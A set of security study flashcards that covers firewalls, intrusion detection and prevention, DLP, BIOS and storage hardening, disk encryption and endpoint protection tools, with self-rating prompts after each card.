Security Applications and Devices Flashcards

1
Q

Software Firewalls

A

Personal Firewalls - software application that protects a single computer from unwanted Internet traffic; host-based firewalls; Windows Firewall; PF and IPFW (OS X); iptables (Linux)
Many anti-malware suites also contain software firewalls.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
2
Q

Intrusion Detection System

A

Device of software application that monitors a system or network and analyzes the data passing through it in order to identify an incident or attack.
Host-Based IDS (HIDS)
Network-Based IDS (NIDS)
Signature-Based - a specific string of bytes triggers an alert.
Policy-Based - relies on specific declaration of the security policy (no Telnet authorized).
Anomaly-Based - analyzes the current traffic against an established baseline and triggers an alert if outside the statistical average.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
3
Q

Types of Alerts

A

True Positive - malicious activity is identified as an attack.
False Positive - legitimate activity is identified as an attack.
True Negative - legitimate activity is identified as legitimate traffic.
False Negative - malicious activity is identified as legitimate traffic.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
4
Q

IDS can only alert and log suspicious activity

A
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
5
Q

IPS can also stop malicious activity from being executed

A
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
6
Q

HIDS logs are used to recreate the events after an attack has occurred

A
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
7
Q

Pop-Up Blockers

A

Most web-browsers have the ability to block JavaScript created pop-ups.
Users may enable pop-ups because they are required for a website to function.
Malicious attackers could purchase ads (pay per click) through various networks.
Content Filters - blocking of external files containing JavaScript, images, or web pages from loading in a browser.
Ensure your browser and its extensions are update regularly.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
8
Q

Data Loss Prevention (DLP)

A

Monitors the data of a system while in use, in transit, or at rest to detect attempts to steal the data.
Software or hardware solutions.
Endpoint DLP system - software-based client that monitors the data in use on a computer and can stop a file transfer or alert an admin of the occurrence.
Network DLP System - software or hardware-based solution that is installed on the perimeter of the network to detect data in transit.
Storage DLP System - software installed on servers in the datacenter to inspect the data at rest.
Cloud DLP System - cloud software as a service that protects data being stored in cloud services.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
9
Q

Securing the Basic Input Output System (BIOS)

A

Firmware that provides the computer instructions for how to accept input and send output.
Unified Extensible Firmware Interface (UEFI)
BIOS and UEFI are used interchangeably in this lesson.
1. Flash the BIOS
2. Use a BIOS password
3. Configure the BIOS boot order
4. Disable the external ports and devices
5. Enable the secure boot option

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
10
Q

Securing Storage Devices

A

Removable media comes in many different formats - you should always encrypt files on removable media.
Remove media controls - technical limitations placed on a system in regards to the utilization of USB storage devices and other removable media; create admin controls such as policies.
Network Attached Storage (NAS) - storage devices that connect directly to your organization’s network; NAS systems often implement RAID arrays to ensure high availability.
Storage Area Network (SAN) - network designed specifically to perform block storage functions that may consist of NAS devices
1. Use data encryption
2. Use proper authentication
3. Log NAS access

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
11
Q

Disk Encryption

A

Encryption scrambles data into unreadable information
Self-Encrypting Drive (SED) - storage device that performs whole disk encryption by using embedded hardware.
Encryption software is most commonly used - FileVault; BitLocker.
Trusted Platform Module (TPM) - chip residing on the motherboard that contains an encryption key; if your motherboard doesn’t have TPM, you can use an external USB drive as a key.
Advanced Encryption Standard (AES) - symmetric key encryption that supports 128-bit and 256-bit keys.
Encryption adds security but has lower performance.
Hardware Security Module (HSM) - physical devices that act as a secure cryptoprocessor during the encryption process.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
12
Q

Endpoint Analysis

A

Anti-virus (AV) - software capable of detecting and removing virus infections and (in most cases) other types of malware, such as worms, Trojans, rootkits, adware, spyware, password crackers, network mappers, DoS tools, and others.
Host-Based IDS/IPS (HIDS/HIPS) - type of IDS or IPS that monitors a computer system for unexpected behavior or drastic changes to the system’s state on an endpoint.
Endpoint Protection Platform (EPP) - a software agent and monitoring system that performs multiple security tasks such as anti-virus, HIDS/HIPS, firewall, DLP, and file encryption.
Endpoint Detection and Response (EDR) - a software agent that collects system data and logs for analysis by a monitoring system to provide early detection of threats.
User and Entity Behavior Analytics (UEBA) - a system that can provide automated identification of suspicious activity by user accounts and computer hosts; UEBA solutions are heavily dependent on advanced computing techniques like artificial intelligence and machine learning; Many companies are now marketing advanced threat protection (ATP), advanced endpoint protection (AEP), and NextGen AV (NGAV) which is a hybrid of EPP, EDR, and UEBA.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly